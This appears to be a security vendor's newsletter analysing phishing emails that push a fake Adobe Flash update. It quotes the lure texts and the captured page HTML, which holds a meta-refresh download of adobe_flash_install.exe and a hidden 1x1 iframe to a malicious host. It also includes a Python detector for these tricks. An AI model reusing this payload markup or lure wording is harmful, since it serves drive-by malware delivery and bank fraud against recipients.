Adobe Flash malware in what appears as phishing emails


Several emails captured by Ax3soft look like ordinary phishing emails, but when we investigate the included URLs further they turn out to be attempts to install malware on the recipient's computer, disguised as an important Flash Player update from Adobe.

  • Online Banking Account Alert

The first example comes from the fake sender address “Electronic Payments Association <buttesob62@rowan-glen.com>” with the subject “Online Banking Account Alert!”; the main content of the email is as follows:

You must submit verification documents to continue using your account without interruption. To view the details of this request and submit the required information, click on the following link (or copy & paste it into your web browser):

hxxp://astroereyna.gr/

We thank you for your assistance in this matter.

When we opened the web site in Firefox we got the message “Sorry, you need to install flash player to see this content…”, and the download manager opened with that message and downloaded the file adobe_flash_install.exe. The code of the web page is as follows:

Sorry, you need to install flash player to see this content...

<meta http-equiv="refresh" content="3;url=hxxp://astroereyna.gr/adobe_flash_install.exe" />
<iframe src='hxxp://diamonddoctor.ru:8080/index.php?pid=10' width='1' height='1' style='visibility: hidden;'></iframe>

When we accessed the same web site with Safari, we received an HTML frameset instead, so some JavaScript redirection also appears to be active.
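To make the two page tricks above concrete, here is an added Python example (not part of this newsletter and not Ax3soft's Sax2 policy code) that scans HTML for a meta refresh pointing straight at an executable and for a hidden 1x1 iframe; it is run over a constructed copy of the captured page with the URLs kept defanged as hxxp:

```python
"""Added example: flag a <meta refresh> that points at an executable and a
hidden 1x1 <iframe> to another host, the two tricks seen on the captured page."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample reproducing the captured page (URLs kept defanged as hxxp).
SAMPLE_PAGE = """Sorry, you need to install flash player to see this content...
<meta http-equiv="refresh" content="3;url=hxxp://astroereyna.gr/adobe_flash_install.exe" />
<iframe src='hxxp://diamonddoctor.ru:8080/index.php?pid=10' width='1' height='1' style='visibility: hidden;'></iframe>
"""

EXEC_SUFFIXES = (".exe", ".scr", ".msi", ".bat")


class DropperPageScanner(HTMLParser):
    """Collects human-readable findings while the HTML is parsed."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            # content looks like "3;url=..."; keep everything after "url="
            _, sep, url = a.get("content", "").partition("url=")
            if sep:
                url = url.strip().strip("'\"")
                path = urlparse(url.replace("hxxp", "http", 1)).path.lower()
                if path.endswith(EXEC_SUFFIXES):
                    self.findings.append(f"meta-refresh to executable: {url}")
        elif tag == "iframe":
            src = a.get("src", "")
            style = a.get("style", "").replace(" ", "").lower()
            tiny = a.get("width") in ("0", "1") and a.get("height") in ("0", "1")
            hidden = "visibility:hidden" in style or "display:none" in style
            if src and (tiny or hidden):
                u = urlparse(src.replace("hxxp", "http", 1))
                port = f":{u.port}" if u.port else ""
                self.findings.append(f"hidden iframe to {u.hostname}{port}{u.path}")


def scan_page(html: str) -> list:
    """Return the list of findings for one HTML document (empty if clean)."""
    scanner = DropperPageScanner()
    scanner.feed(html)
    return scanner.findings


if __name__ == "__main__":
    for finding in scan_page(SAMPLE_PAGE):
        print("ALERT:", finding)
```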

  • An unauthorized transaction billed from your bank account

The second example comes from the fake sender address “Electronic Payments Association <euphemismm215@reagirona.com>”, with the subject “An unauthorized transaction billed from your bank account”; the main content is as follows:

Dear bank account holder,

The ACH transaction, recently initiated from your bank account, was rejected by the Electronic Payments Association. Please review the transaction report by clicking the link below:

Unauthorized ACH Transaction Report

——————————————————————

Copyright ©2010 by NACHA – The Electronic Payments Association

The text “Unauthorized ACH Transaction Report” links to a fast-flux domain. Following the link brings up the following screen in the browser, and one part of it is a download of the file adobe_flash_install.exe.


We have added new Ax3soft Sax2 policies to detect this Trojan; please update the Sax2 policy knowledge base promptly.

For more information, please visit http://www.ids-sax2.com/ComputerSecurityNewsletter.htm